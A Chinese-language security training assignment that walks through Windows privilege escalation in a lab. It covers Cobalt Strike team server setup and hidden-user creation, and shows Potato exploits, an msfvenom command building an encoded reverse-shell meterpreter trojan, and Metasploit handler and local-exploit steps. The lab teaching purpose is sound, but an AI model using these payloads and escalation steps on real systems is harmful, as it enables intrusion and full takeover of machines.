实训作业day09
一、安装CS
-
压缩包解压后,将Server文件夹传给云服务器(我使用的是xftp)。命令如下:
#mkdir -p /root/cs4.8 #Server传输给云服务器 #cd /root/cs4.8/Server
-
给teamserver和TeamServerImage添加执行权限。
#chmod +x teamserver #chmod +x TeamServerImage
-
执行命令“./teamserver 47.108.222.178 123456”(./teamserver IP 密码)启动cs服务端。
-
双击安装目录下的Cobalt_Strike_CN.vbs,输入Host和Password,点击“Connect”等待连接成功。
-
点击“Cobalt Strike”,选择“脚本服务器”,点击“Load”,在plugin目录中找到后缀为na的插件文件添加(需要欧拉、梼杌、谢公子、巨龙拉东4个插件)。
二、用户组和用户、windows信息搜集命令
2.1 Windows用户组和用户命令
功能 | 命令 |
---|---|
新增用户 | net user zs pass /add |
删除用户 | net user zs /del |
新增隐藏用户 | net user zs$ pass /add |
新增用户组 | net localgroup worker /add |
删除用户组 | net localgroup worker /del |
添加用户到用户组 | net localgroup worker zs /add |
从用户组中删除用户 | net localgroup worker zs /del |
将普通用户添加到管理员用户(提权) | net localgroup administrator zs /add |
2.2 windows信息搜集命令
命令 | 信息 |
---|---|
systeminfo | 打印系统信息 |
whoami | 获得当前用户名 |
whoami /priv | 当前帐户权限 |
ipconfig | 网络配置信息 |
ipconfig /displaydns | 显示DNS缓存 |
route print | 打印出路由表 |
arp -a | 打印arp表 |
hostname | 主机名 |
net user | 列出用户 |
net user UserName | 关于用户的信息 |
net localgroup | 列出所有组 |
net localgroup GROUP | 关于指定组的信息 |
tasklist /svc | 列出服务任务 |
net start | 列出启动的服务 |
三、手工提权思路和土豆提权
3.1 手工提权
-
补丁筛选
- 在目标主机上执行systeminfo,打印系统信息输出信息到本机。
- 把系统信息文件放到 解压后的wesng-master 中。
- 在本机执行以下命令。
- python wes.py systeminfo.txt --color -i "Elevation of Privilege’”
- 根据找到的漏洞编号去找能够使用的脚本。
-
EXP获取
-
下面的项目都包含了大量漏洞脚本,根据编号找到后在可读写目录运行。
https://github.com/Ascotbe/Kernelhub http://kernelhub.ascotbe.com/Windows/Docs/#/ https://github.com/SecWiki/windows-kernel-exploits https://github.com/nomi-sec/PoC-in-GitHub https://gitlab.com/exploit-database/exploitdb
-
3.2 土豆提权
-
Winserver2012 R2配置IIS。
-
打开服务器管理器,点击添加⻆⾊和功能。
-
一直选择”下一步“,到”服务器选择“时勾选web服务器(IIS)—>点击添加功能—>单击下⼀步。
-
一直选择”下一步“,到”安装”后等待安装完毕后关闭。
-
-
将下载的PrintNotifyPotato-NET46.exe传给winserver2012,打开cmd执行命令“PrintNotifyPotato-NET46.exe whoami”成功提权。
四、CS插件提权
-
开启CS客户端。
-
双击安装目录下的Cobalt_Strike_CN.vbs,输入Host和Password,点击“Connect”等待连接成功。
-
设置listener,注意端口不要冲突。
-
在“有效载荷”生成木马。
-
选择存储路径。
-
传输到winserver2012,并双击木马。
-
设置“回连间隔”。
-
选择“会话交互”打开命令行,使用梼杌中的“SweetPotato”进行提权。
-
输入“shell whoami”看到已经提权为system。
五、MSF提权
-
安装msf(kali内置nsf,此步骤跳过)。
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
-
设置靶机防火墙,确保主机和靶机能ping通。
-
启动msf,生成木马,将木马文件设置最大读写权限。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
-
把msf.exe传给靶机后,重启msf终端。
-
监听木马。
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 --所有网关的某个端口都监听. set lport 8888 show option run --进行监听
-
Winserver2012双击msf.exe,成功监听。
-
使用“getuid”查看用户和权限。
-
使⽤提权模块(找补丁)。
use post/windows/gather/enum_patches #设置提权模块(找补丁) options #查看参数 set session 2 #设置编号 run #开始收集
-
由于没有找到补丁,后续步骤无法进行,所以缺少实验截图。
-
找漏洞。
use post/multi/recon/local_exploit_suggester #设置提权模块 options #设置参数 set session 2 #设置会话编号 run #开始检测
-
选择Check Result为“The target appears to be vulnerable.”的漏洞进行提权(假设存在exploit/windows/local/ms16_075_reflection_juicy)。
use exploit/windows/local/ms16_075_reflection_juicy options set session 3 set lport 6666 run
-
返回端口。
use exploit/multi/handler set payload windows/meterpreter/reverse tcp set lport 6666 set lhost nip run getuid